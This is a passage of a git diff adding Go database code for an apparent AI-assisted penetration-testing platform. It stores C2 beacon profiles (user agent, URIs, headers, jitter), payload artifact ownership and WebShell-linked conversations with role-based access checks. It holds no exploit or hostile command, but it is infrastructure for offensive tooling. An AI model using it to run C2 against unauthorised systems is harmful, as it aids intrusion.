jitter_min_ms, jitter_max_ms, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, p.ID, p.Name, p.UserAgent, string(urisJSON), + string(reqHdrJSON), string(resHdrJSON), p.BodyTemplate, + p.JitterMinMS, p.JitterMaxMS, p.CreatedAt) + return err +} + +// UpdateC2Profile 全量更新 Profile +func (db *DB) UpdateC2Profile(p *C2Profile) error { + if p == nil || strings.TrimSpace(p.ID) == "" { + return errors.New("profile id is required") + } + urisJSON, _ := json.Marshal(p.URIs) + reqHdrJSON, _ := json.Marshal(p.RequestHeaders) + resHdrJSON, _ := json.Marshal(p.ResponseHeaders) + query := ` + UPDATE c2_profiles SET name = ?, user_agent = ?, uris_json = ?, + request_headers_json = ?, response_headers_json = ?, body_template = ?, + jitter_min_ms = ?, jitter_max_ms = ? + WHERE id = ? + ` + res, err := db.Exec(query, p.Name, p.UserAgent, string(urisJSON), + string(reqHdrJSON), string(resHdrJSON), p.BodyTemplate, + p.JitterMinMS, p.JitterMaxMS, p.ID) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Profile 单条 +func (db *DB) GetC2Profile(id string) (*C2Profile, error) { + query := ` + SELECT id, name, COALESCE(user_agent, ''), COALESCE(uris_json, '[]'), + COALESCE(request_headers_json, '{}'), COALESCE(response_headers_json, '{}'), + COALESCE(body_template, ''), COALESCE(jitter_min_ms, 0), COALESCE(jitter_max_ms, 0), + created_at + FROM c2_profiles WHERE id = ? + ` + var p C2Profile + var urisJSON, reqHdrJSON, resHdrJSON string + err := db.QueryRow(query, id).Scan(&p.ID, &p.Name, &p.UserAgent, &urisJSON, + &reqHdrJSON, &resHdrJSON, &p.BodyTemplate, &p.JitterMinMS, &p.JitterMaxMS, &p.CreatedAt) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + _ = json.Unmarshal([]byte(urisJSON), &p.URIs) + _ = json.Unmarshal([]byte(reqHdrJSON), &p.RequestHeaders) + _ = json.Unmarshal([]byte(resHdrJSON), &p.ResponseHeaders) + return &p, nil +} + +// ListC2Profiles 全量列表 +func (db *DB) ListC2Profiles() ([]*C2Profile, error) { + query := ` + SELECT id, name, COALESCE(user_agent, ''), COALESCE(uris_json, '[]'), + COALESCE(request_headers_json, '{}'), COALESCE(response_headers_json, '{}'), + COALESCE(body_template, ''), COALESCE(jitter_min_ms, 0), COALESCE(jitter_max_ms, 0), + created_at + FROM c2_profiles ORDER BY created_at DESC + ` + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Profile + for rows.Next() { + var p C2Profile + var urisJSON, reqHdrJSON, resHdrJSON string + if err := rows.Scan(&p.ID, &p.Name, &p.UserAgent, &urisJSON, + &reqHdrJSON, &resHdrJSON, &p.BodyTemplate, &p.JitterMinMS, &p.JitterMaxMS, &p.CreatedAt); err != nil { + continue + } + _ = json.Unmarshal([]byte(urisJSON), &p.URIs) + _ = json.Unmarshal([]byte(reqHdrJSON), &p.RequestHeaders) + _ = json.Unmarshal([]byte(resHdrJSON), &p.ResponseHeaders) + list = append(list, &p) + } + return list, rows.Err() +} + +// DeleteC2Profile 删除 Profile(不影响已用此 Profile 的 listener,仅断开关联) +func (db *DB) DeleteC2Profile(id string) error { + if _, err := db.Exec(`UPDATE c2_listeners SET profile_id = '' WHERE profile_id = ?`, id); err != nil { + return err + } + res, err := db.Exec(`DELETE FROM c2_profiles WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} diff --git a/internal/database/c2_payload.go b/internal/database/c2_payload.go new file mode 100644 index 00000000..0755b640 --- /dev/null +++ b/internal/database/c2_payload.go @@ -0,0 +1,30 @@ +package database + +import ( + "strings" + "time" +) + +func (db *DB) RecordC2PayloadArtifact(filename, payloadID, listenerID, ownerUserID string) error { + filename = strings.TrimSpace(filename) + if filename == "" || strings.TrimSpace(listenerID) == "" || strings.TrimSpace(ownerUserID) == "" { + return nil + } + _, err := db.Exec(` + INSERT INTO c2_payload_artifacts(filename, payload_id, listener_id, owner_user_id, created_at) + VALUES (?, ?, ?, ?, ?) + ON CONFLICT(filename) DO UPDATE SET payload_id=excluded.payload_id, listener_id=excluded.listener_id, owner_user_id=excluded.owner_user_id, created_at=excluded.created_at + `, filename, payloadID, listenerID, ownerUserID, time.Now()) + return err +} + +func (db *DB) UserCanAccessC2Payload(userID, scope, filename string) bool { + if scope == RBACScopeAll { + return true + } + var listenerID, ownerUserID string + if err := db.QueryRow(`SELECT listener_id, owner_user_id FROM c2_payload_artifacts WHERE filename = ?`, strings.TrimSpace(filename)).Scan(&listenerID, &ownerUserID); err != nil { + return false + } + return ownerUserID == strings.TrimSpace(userID) || db.UserCanAccessResource(userID, scope, "c2_listener", listenerID) +} diff --git a/internal/database/chat_upload.go b/internal/database/chat_upload.go new file mode 100644 index 00000000..5c27004c --- /dev/null +++ b/internal/database/chat_upload.go @@ -0,0 +1,56 @@ +package database + +import ( + "strings" + "time" +) + +func (db *DB) UpsertChatUploadArtifact(relativePath, conversationID, ownerUserID string) error { + relativePath = strings.TrimSpace(relativePath) + conversationID = strings.TrimSpace(conversationID) + ownerUserID = strings.TrimSpace(ownerUserID) + if relativePath == "" || conversationID == "" || ownerUserID == "" { + return nil + } + _, err := db.Exec(` + INSERT INTO chat_upload_artifacts(relative_path, conversation_id, owner_user_id, created_at) + VALUES (?, ?, ?, ?) + ON CONFLICT(relative_path) DO UPDATE SET conversation_id=excluded.conversation_id, owner_user_id=excluded.owner_user_id + `, relativePath, conversationID, ownerUserID, time.Now()) + return err +} + +func (db *DB) GetChatUploadArtifact(relativePath string) (conversationID, ownerUserID string, ok bool) { + err := db.QueryRow(`SELECT conversation_id, owner_user_id FROM chat_upload_artifacts WHERE relative_path = ?`, strings.TrimSpace(relativePath)).Scan(&conversationID, &ownerUserID) + return conversationID, ownerUserID, err == nil +} + +func (db *DB) DeleteChatUploadArtifactPath(relativePath string) error { + path := strings.Trim(strings.TrimSpace(relativePath), "/") + if path == "" { + return nil + } + _, err := db.Exec(`DELETE FROM chat_upload_artifacts WHERE relative_path = ? OR relative_path LIKE ? ESCAPE '\'`, path, escapeLikePrefix(path)+"/%") + return err +} + +func (db *DB) RenameChatUploadArtifactPath(oldPath, newPath string) error { + oldPath = strings.Trim(strings.TrimSpace(oldPath), "/") + newPath = strings.Trim(strings.TrimSpace(newPath), "/") + if oldPath == "" || newPath == "" { + return nil + } + _, err := db.Exec(` + UPDATE chat_upload_artifacts + SET relative_path = CASE + WHEN relative_path = ? THEN ? + ELSE ? || substr(relative_path, length(?) + 1) + END + WHERE relative_path = ? OR relative_path LIKE ? ESCAPE '\' + `, oldPath, newPath, newPath, oldPath, oldPath, escapeLikePrefix(oldPath)+"/%") + return err +} + +func escapeLikePrefix(value string) string { + return strings.NewReplacer(`\`, `\\`, `%`, `\%`, `_`, `\_`).Replace(value) +} diff --git a/internal/database/conversation.go b/internal/database/conversation.go new file mode 100644 index 00000000..7ecac55e --- /dev/null +++ b/internal/database/conversation.go @@ -0,0 +1,1817 @@ +package database + +import ( + "database/sql" + "encoding/json" + "errors" + "fmt" + "os" + "path/filepath" + "strings" + "time" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// ProjectFilterUnbound 列表 API 中 project_id=__none__ 表示仅未绑定项目的对话。 +const ProjectFilterUnbound = "__none__" + +// Conversation 对话 +type Conversation struct { + ID string `json:"id"` + Title string `json:"title"` + ProjectID string `json:"projectId,omitempty"` + RoleName string `json:"roleName,omitempty"` + AgentMode string `json:"agentMode,omitempty"` + Pinned bool `json:"pinned"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` + Messages []Message `json:"messages,omitempty"` +} + +// Message 消息 +type Message struct { + ID string `json:"id"` + ConversationID string `json:"conversationId"` + Role string `json:"role"` + Content string `json:"content"` + ReasoningContent string `json:"reasoningContent,omitempty"` + MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"` + ProcessDetails []map[string]interface{} `json:"processDetails,omitempty"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// CreateConversation 创建新对话 +func (db *DB) CreateConversation(title string, meta ConversationCreateMeta) (*Conversation, error) { + return db.CreateConversationWithWebshell("", title, meta) +} + +// CreateConversationWithWebshell 创建新对话,可选绑定 WebShell 连接 ID(为空则普通对话) +func (db *DB) CreateConversationWithWebshell(webshellConnectionID, title string, meta ConversationCreateMeta) (*Conversation, error) { + id := uuid.New().String() + now := time.Now() + + projectID := strings.TrimSpace(meta.ProjectID) + if projectID != "" { + if _, err := db.GetProject(projectID); err != nil { + return nil, err + } + } + roleName := normalizeConversationRoleName(meta.RoleName) + agentMode := normalizeConversationAgentMode(meta.AgentMode) + + var err error + wsID := strings.TrimSpace(webshellConnectionID) + switch { + case wsID != "" && projectID != "": + _, err = db.Exec( + "INSERT INTO conversations (id, title, created_at, updated_at, webshell_connection_id, project_id, role_name, agent_mode) VALUES (?, ?, ?, ?, ?, ?, ?, ?)", + id, title, now, now, wsID, projectID, roleName, agentMode, + ) + case wsID != "": + _, err = db.Exec( + "INSERT INTO conversations (id, title, created_at, updated_at, webshell_connection_id, role_name, agent_mode) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, title, now, now, wsID, roleName, agentMode, + ) + case projectID != "": + _, err = db.Exec( + "INSERT INTO conversations (id, title, created_at, updated_at, project_id, role_name, agent_mode) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, title, now, now, projectID, roleName, agentMode, + ) + default: + _, err = db.Exec( + "INSERT INTO conversations (id, title, created_at, updated_at, role_name, agent_mode) VALUES (?, ?, ?, ?, ?, ?)", + id, title, now, now, roleName, agentMode, + ) + } + if err != nil { + return nil, fmt.Errorf("创建对话失败: %w", err) + } + + conv := &Conversation{ + ID: id, + Title: title, + ProjectID: projectID, + RoleName: roleName, + AgentMode: agentMode, + CreatedAt: now, + UpdatedAt: now, + } + if wsID != "" { + meta.WebShellConnectionID = wsID + } + notifyConversationCreated(conv, meta) + return conv, nil +} + +// GetConversationByWebshellConnectionID 根据 WebShell 连接 ID 获取该连接下最近一条对话(用于 AI 助手持久化) +func (db *DB) GetConversationByWebshellConnectionID(connectionID string) (*Conversation, error) { + if connectionID == "" { + return nil, fmt.Errorf("connectionID is empty") + } + var conv Conversation + var createdAt, updatedAt string + var pinned int + err := db.QueryRow( + "SELECT id, title, pinned, created_at, updated_at FROM conversations WHERE webshell_connection_id = ? ORDER BY updated_at DESC LIMIT 1", + connectionID, + ).Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt) + if err != nil { + if err == sql.ErrNoRows { + return nil, nil + } + return nil, fmt.Errorf("查询对话失败: %w", err) + } + conv.Pinned = pinned != 0 + if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt); e == nil { + conv.CreatedAt = t + } else if t, e := time.Parse("2006-01-02 15:04:05", createdAt); e == nil { + conv.CreatedAt = t + } else { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt); e == nil { + conv.UpdatedAt = t + } else if t, e := time.Parse("2006-01-02 15:04:05", updatedAt); e == nil { + conv.UpdatedAt = t + } else { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + messages, err := db.GetMessages(conv.ID) + if err != nil { + return nil, fmt.Errorf("加载消息失败: %w", err) + } + conv.Messages = messages + + // 加载过程详情并附加到对应消息(与 GetConversation 一致,便于刷新后仍可查看执行过程) + processDetailsMap, err := db.GetProcessDetailsByConversation(conv.ID) + if err != nil { + db.logger.Warn("加载过程详情失败", zap.Error(err)) + processDetailsMap = make(map[string][]ProcessDetail) + } + for i := range conv.Messages { + if details, ok := processDetailsMap[conv.Messages[i].ID]; ok { + details = DedupeConsecutiveProcessDetails(details) + detailsJSON := make([]map[string]interface{}, len(details)) + for j, detail := range details { + var data interface{} + if detail.Data != "" { + if err := json.Unmarshal([]byte(detail.Data), &data); err != nil { + db.logger.Warn("解析过程详情数据失败", zap.Error(err)) + } + } + detailsJSON[j] = map[string]interface{}{ + "id": detail.ID, + "messageId": detail.MessageID, + "conversationId": detail.ConversationID, + "eventType": detail.EventType, + "message": detail.Message, + "data": data, + "createdAt": detail.CreatedAt, + } + } + conv.Messages[i].ProcessDetails = detailsJSON + } + } + + return &conv, nil +} + +// WebShellConversationItem 用于侧边栏列表,不含消息 +type WebShellConversationItem struct { + ID string `json:"id"` + Title string `json:"title"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// ListConversationsByWebshellConnectionID 列出该 WebShell 连接下的所有对话(按更新时间倒序),供侧边栏展示 +func (db *DB) ListConversationsByWebshellConnectionID(connectionID string) ([]WebShellConversationItem, error) { + if connectionID == "" { + return nil, nil + } + rows, err := db.Query( + "SELECT id, title, updated_at FROM conversations WHERE webshell_connection_id = ? ORDER BY updated_at DESC", + connectionID, + ) + if err != nil { + return nil, fmt.Errorf("查询对话列表失败: %w", err) + } + defer rows.Close() + var list []WebShellConversationItem + for rows.Next() { + var item WebShellConversationItem + var updatedAt string + if err := rows.Scan(&item.ID, &item.Title, &updatedAt); err != nil { + continue + } + if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt); e == nil { + item.UpdatedAt = t + } else if t, e := time.Parse("2006-01-02 15:04:05", updatedAt); e == nil { + item.UpdatedAt = t + } else { + item.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + list = append(list, item) + } + return list, rows.Err() +} + +// ConversationExists reports whether a conversation row exists (lightweight check for audit links). +func (db *DB) ConversationExists(id string) (bool, error) { + id = strings.TrimSpace(id) + if id == "" { + return false, nil + } + var one int + err := db.QueryRow("SELECT 1 FROM conversations WHERE id = ? LIMIT 1", id).Scan(&one) + if err == sql.ErrNoRows { + return false, nil + } + if err != nil { + return false, err + } + return true, nil +} + +// GetConversation 获取对话 +func (db *DB) GetConversation(id string) (*Conversation, error) { + var conv Conversation + var createdAt, updatedAt string + var pinned int + + var projectID sql.NullString + var roleName sql.NullString + var agentMode sql.NullString + err := db.QueryRow( + "SELECT id, title, pinned, created_at, updated_at, project_id, role_name, agent_mode FROM conversations WHERE id = ?", + id, + ).Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &projectID, &roleName, &agentMode) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("对话不存在") + } + return nil, fmt.Errorf("查询对话失败: %w", err) + } + if projectID.Valid { + conv.ProjectID = strings.TrimSpace(projectID.String) + } + if roleName.Valid { + conv.RoleName = normalizeConversationRoleName(roleName.String) + } + if agentMode.Valid { + conv.AgentMode = normalizeConversationAgentMode(agentMode.String) + } + + // 尝试多种时间格式解析 + var err1, err2 error + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + conv.Pinned = pinned != 0 + + // 加载消息 + messages, err := db.GetMessages(id) + if err != nil { + return nil, fmt.Errorf("加载消息失败: %w", err) + } + conv.Messages = messages + + // 加载过程详情(按消息ID分组) + processDetailsMap, err := db.GetProcessDetailsByConversation(id) + if err != nil { + db.logger.Warn("加载过程详情失败", zap.Error(err)) + processDetailsMap = make(map[string][]ProcessDetail) + } + + // 将过程详情附加到对应的消息上 + for i := range conv.Messages { + if details, ok := processDetailsMap[conv.Messages[i].ID]; ok { + details = DedupeConsecutiveProcessDetails(details) + // 将ProcessDetail转换为JSON格式,以便前端使用 + detailsJSON := make([]map[string]interface{}, len(details)) + for j, detail := range details { + var data interface{} + if detail.Data != "" { + if err := json.Unmarshal([]byte(detail.Data), &data); err != nil { + db.logger.Warn("解析过程详情数据失败", zap.Error(err)) + } + } + detailsJSON[j] = map[string]interface{}{ + "id": detail.ID, + "messageId": detail.MessageID, + "conversationId": detail.ConversationID, + "eventType": detail.EventType, + "message": detail.Message, + "data": data, + "createdAt": detail.CreatedAt, + } + } + conv.Messages[i].ProcessDetails = detailsJSON + } + } + + return &conv, nil +} + +// GetConversationLite 获取对话(轻量版):包含 messages,但不加载 process_details。 +// 用于历史会话快速切换,避免一次性把大体量过程详情灌到前端导致卡顿。 +func (db *DB) GetConversationLite(id string) (*Conversation, error) { + var conv Conversation + var createdAt, updatedAt string + var pinned int + + var projectID sql.NullString + var roleName sql.NullString + var agentMode sql.NullString + err := db.QueryRow( + "SELECT id, title, pinned, created_at, updated_at, project_id, role_name, agent_mode FROM conversations WHERE id = ?", + id, + ).Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &projectID, &roleName, &agentMode) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("对话不存在") + } + return nil, fmt.Errorf("查询对话失败: %w", err) + } + if projectID.Valid { + conv.ProjectID = strings.TrimSpace(projectID.String) + } + if roleName.Valid { + conv.RoleName = normalizeConversationRoleName(roleName.String) + } + if agentMode.Valid { + conv.AgentMode = normalizeConversationAgentMode(agentMode.String) + } + + // 尝试多种时间格式解析 + var err1, err2 error + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + conv.Pinned = pinned != 0 + + // 加载消息(不加载 process_details / reasoning_content,减少历史会话切换 payload) + messages, err := db.GetMessagesLite(id) + if err != nil { + return nil, fmt.Errorf("加载消息失败: %w", err) + } + conv.Messages = messages + return &conv, nil +} + +func normalizeConversationRoleName(roleName string) string { + roleName = strings.TrimSpace(roleName) + if roleName == "" { + return "默认" + } + return roleName +} + +func normalizeConversationAgentMode(agentMode string) string { + agentMode = strings.ToLower(strings.TrimSpace(agentMode)) + agentMode = strings.ReplaceAll(agentMode, "-", "_") + switch agentMode { + case "deep", "plan_execute", "supervisor": + return agentMode + default: + return "eino_single" + } +} + +func (db *DB) SetConversationRoleName(id, roleName string) error { + roleName = normalizeConversationRoleName(roleName) + _, err := db.Exec( + "UPDATE conversations SET role_name = ?, updated_at = ? WHERE id = ?", + roleName, time.Now(), id, + ) + if err != nil { + return fmt.Errorf("更新对话角色失败: %w", err) + } + return nil +} + +func (db *DB) SetConversationAgentMode(id, agentMode string) error { + agentMode = normalizeConversationAgentMode(agentMode) + _, err := db.Exec( + "UPDATE conversations SET agent_mode = ? WHERE id = ?", + agentMode, id, + ) + if err != nil { + return fmt.Errorf("更新对话模式失败: %w", err) + } + return nil +} + +func conversationProjectIDColumn(alias string) string { + if alias != "" { + return alias + ".project_id" + } + return "project_id" +} + +func appendConversationProjectFilter(where string, args []interface{}, projectID, alias string) (string, []interface{}) { + pid := strings.TrimSpace(projectID) + if pid == "" { + return where, args + } + col := conversationProjectIDColumn(alias) + if pid == ProjectFilterUnbound { + return where + fmt.Sprintf(" AND (%s IS NULL OR TRIM(COALESCE(%s, '')) = '')", col, col), args + } + return where + fmt.Sprintf(" AND %s = ?", col), append(args, pid) +} + +func appendConversationAccessFilter(where string, args []interface{}, userID, scope, alias string) (string, []interface{}) { + userID = strings.TrimSpace(userID) + if userID == "" || scope == RBACScopeAll { + return where, args + } + prefix := "" + if alias != "" { + prefix = alias + "." + } + where += fmt.Sprintf(` AND (%sowner_user_id = ? OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'conversation' AND ra.resource_id = %sid + ) OR EXISTS ( + SELECT 1 FROM projects p + WHERE p.id = %sproject_id AND ( + p.owner_user_id = ? OR EXISTS ( + SELECT 1 FROM rbac_resource_assignments pra + WHERE pra.user_id = ? AND pra.resource_type = 'project' AND pra.resource_id = p.id + ) + ) + ))`, prefix, prefix, prefix) + args = append(args, userID, userID, userID, userID) + return where, args +} + +// CountConversations 统计对话数量。 +func (db *DB) CountConversations(search, projectID string) (int, error) { + var count int + var err error + if search != "" { + searchPattern := "%" + search + "%" + where := ` WHERE (c.title LIKE ? + OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?))` + args := []interface{}{searchPattern, searchPattern} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + err = db.QueryRow(`SELECT COUNT(*) FROM conversations c`+where, args...).Scan(&count) + } else { + where := "" + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "") + if where != "" { + where = " WHERE" + strings.TrimPrefix(where, " AND") + } + err = db.QueryRow(`SELECT COUNT(*) FROM conversations`+where, args...).Scan(&count) + } + if err != nil { + return 0, fmt.Errorf("统计对话失败: %w", err) + } + return count, nil +} + +func (db *DB) CountConversationsForAccess(search, projectID, userID, scope string) (int, error) { + var count int + var err error + if search != "" { + searchPattern := "%" + search + "%" + where := ` WHERE (c.title LIKE ? + OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?))` + args := []interface{}{searchPattern, searchPattern} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + where, args = appendConversationAccessFilter(where, args, userID, scope, "c") + err = db.QueryRow(`SELECT COUNT(*) FROM conversations c`+where, args...).Scan(&count) + } else { + where := "" + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "") + where, args = appendConversationAccessFilter(where, args, userID, scope, "") + if where != "" { + where = " WHERE" + strings.TrimPrefix(where, " AND") + } + err = db.QueryRow(`SELECT COUNT(*) FROM conversations`+where, args...).Scan(&count) + } + if err != nil { + return 0, fmt.Errorf("统计对话失败: %w", err) + } + return count, nil +} + +func conversationOrderClause(sortBy, tableAlias string) string { + col := "updated_at" + if strings.TrimSpace(strings.ToLower(sortBy)) == "created_at" { + col = "created_at" + } + prefix := tableAlias + if prefix != "" { + prefix += "." + } + return "ORDER BY " + prefix + col + " DESC" +} + +// ListConversations 列出所有对话 +func (db *DB) ListConversations(limit, offset int, search, sortBy, projectID string) ([]*Conversation, error) { + var rows *sql.Rows + var err error + + if search != "" { + // 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积 + searchPattern := "%" + search + "%" + orderClause := conversationOrderClause(sortBy, "c") + where := ` WHERE (c.title LIKE ? + OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?))` + args := []interface{}{searchPattern, searchPattern} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + args = append(args, limit, offset) + rows, err = db.Query( + `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id, c.role_name, c.agent_mode + FROM conversations c`+where+` + `+orderClause+` + LIMIT ? OFFSET ?`, + args..., + ) + } else { + orderClause := conversationOrderClause(sortBy, "") + where := "" + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "") + if where != "" { + where = " WHERE" + strings.TrimPrefix(where, " AND") + } + args = append(args, limit, offset) + rows, err = db.Query( + "SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id, role_name, agent_mode FROM conversations"+where+" "+orderClause+" LIMIT ? OFFSET ?", + args..., + ) + } + + if err != nil { + return nil, fmt.Errorf("查询对话列表失败: %w", err) + } + defer rows.Close() + return scanConversationRows(rows) +} + +func (db *DB) ListConversationsForAccess(limit, offset int, search, sortBy, projectID, userID, scope string) ([]*Conversation, error) { + if scope == RBACScopeAll || strings.TrimSpace(userID) == "" { + return db.ListConversations(limit, offset, search, sortBy, projectID) + } + var rows *sql.Rows + var err error + if search != "" { + searchPattern := "%" + search + "%" + orderClause := conversationOrderClause(sortBy, "c") + where := ` WHERE (c.title LIKE ? + OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?))` + args := []interface{}{searchPattern, searchPattern} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + where, args = appendConversationAccessFilter(where, args, userID, scope, "c") + args = append(args, limit, offset) + rows, err = db.Query( + `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id, c.role_name, c.agent_mode + FROM conversations c`+where+` + `+orderClause+` + LIMIT ? OFFSET ?`, args...) + } else { + orderClause := conversationOrderClause(sortBy, "") + where := "" + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "") + where, args = appendConversationAccessFilter(where, args, userID, scope, "") + if where != "" { + where = " WHERE" + strings.TrimPrefix(where, " AND") + } + args = append(args, limit, offset) + rows, err = db.Query( + "SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id, role_name, agent_mode FROM conversations"+where+" "+orderClause+" LIMIT ? OFFSET ?", + args...) + } + if err != nil { + return nil, fmt.Errorf("查询对话列表失败: %w", err) + } + defer rows.Close() + return scanConversationRows(rows) +} + +func scanConversationRows(rows *sql.Rows) ([]*Conversation, error) { + var conversations []*Conversation + for rows.Next() { + var conv Conversation + var createdAt, updatedAt string + var pinned int + var projectID sql.NullString + var roleName sql.NullString + var agentMode sql.NullString + if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &projectID, &roleName, &agentMode); err != nil { + return nil, fmt.Errorf("扫描对话失败: %w", err) + } + if projectID.Valid { + conv.ProjectID = strings.TrimSpace(projectID.String) + } + if roleName.Valid { + conv.RoleName = normalizeConversationRoleName(roleName.String) + } + if agentMode.Valid { + conv.AgentMode = normalizeConversationAgentMode(agentMode.String) + } + var err1, err2 error + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + conv.Pinned = pinned != 0 + conversations = append(conversations, &conv) + } + return conversations, rows.Err() +} + +const ungroupedConversationsSQL = ` + FROM conversations c + WHERE NOT EXISTS ( + SELECT 1 FROM conversation_group_mappings cgm WHERE cgm.conversation_id = c.id + )` + +// CountUngroupedConversations 统计不在任何分组中的对话数量。 +func (db *DB) CountUngroupedConversations(projectID string) (int, error) { + where := ungroupedConversationsSQL + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + var count int + if err := db.QueryRow(`SELECT COUNT(*) `+where, args...).Scan(&count); err != nil { + return 0, fmt.Errorf("统计未分组对话失败: %w", err) + } + return count, nil +} + +func (db *DB) CountUngroupedConversationsForAccess(projectID, userID, scope string) (int, error) { + where := ungroupedConversationsSQL + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + where, args = appendConversationAccessFilter(where, args, userID, scope, "c") + var count int + if err := db.QueryRow(`SELECT COUNT(*) `+where, args...).Scan(&count); err != nil { + return 0, fmt.Errorf("统计未分组对话失败: %w", err) + } + return count, nil +} + +// ListUngroupedConversations 列出不在任何分组中的对话(最近对话侧栏)。 +func (db *DB) ListUngroupedConversations(limit, offset int, sortBy, projectID string) ([]*Conversation, error) { + orderClause := conversationOrderClause(sortBy, "c") + where := ungroupedConversationsSQL + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + args = append(args, limit, offset) + rows, err := db.Query( + `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id, c.role_name, c.agent_mode `+ + where+` + `+orderClause+` + LIMIT ? OFFSET ?`, + args..., + ) + if err != nil { + return nil, fmt.Errorf("查询未分组对话失败: %w", err) + } + defer rows.Close() + return scanConversationRows(rows) +} + +func (db *DB) ListUngroupedConversationsForAccess(limit, offset int, sortBy, projectID, userID, scope string) ([]*Conversation, error) { + if scope == RBACScopeAll || strings.TrimSpace(userID) == "" { + return db.ListUngroupedConversations(limit, offset, sortBy, projectID) + } + orderClause := conversationOrderClause(sortBy, "c") + where := ungroupedConversationsSQL + args := []interface{}{} + where, args = appendConversationProjectFilter(where, args, projectID, "c") + where, args = appendConversationAccessFilter(where, args, userID, scope, "c") + args = append(args, limit, offset) + rows, err := db.Query( + `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id, c.role_name, c.agent_mode `+ + where+` + `+orderClause+` + LIMIT ? OFFSET ?`, + args..., + ) + if err != nil { + return nil, fmt.Errorf("查询未分组对话失败: %w", err) + } + defer rows.Close() + return scanConversationRows(rows) +} + +// GetConversationTitle 获取对话标题(轻量查询,不加载消息) +func (db *DB) GetConversationTitle(id string) (string, error) { + var title string + err := db.QueryRow("SELECT title FROM conversations WHERE id = ?", id).Scan(&title) + if err != nil { + if err == sql.ErrNoRows { + return "", fmt.Errorf("对话不存在") + } + return "", 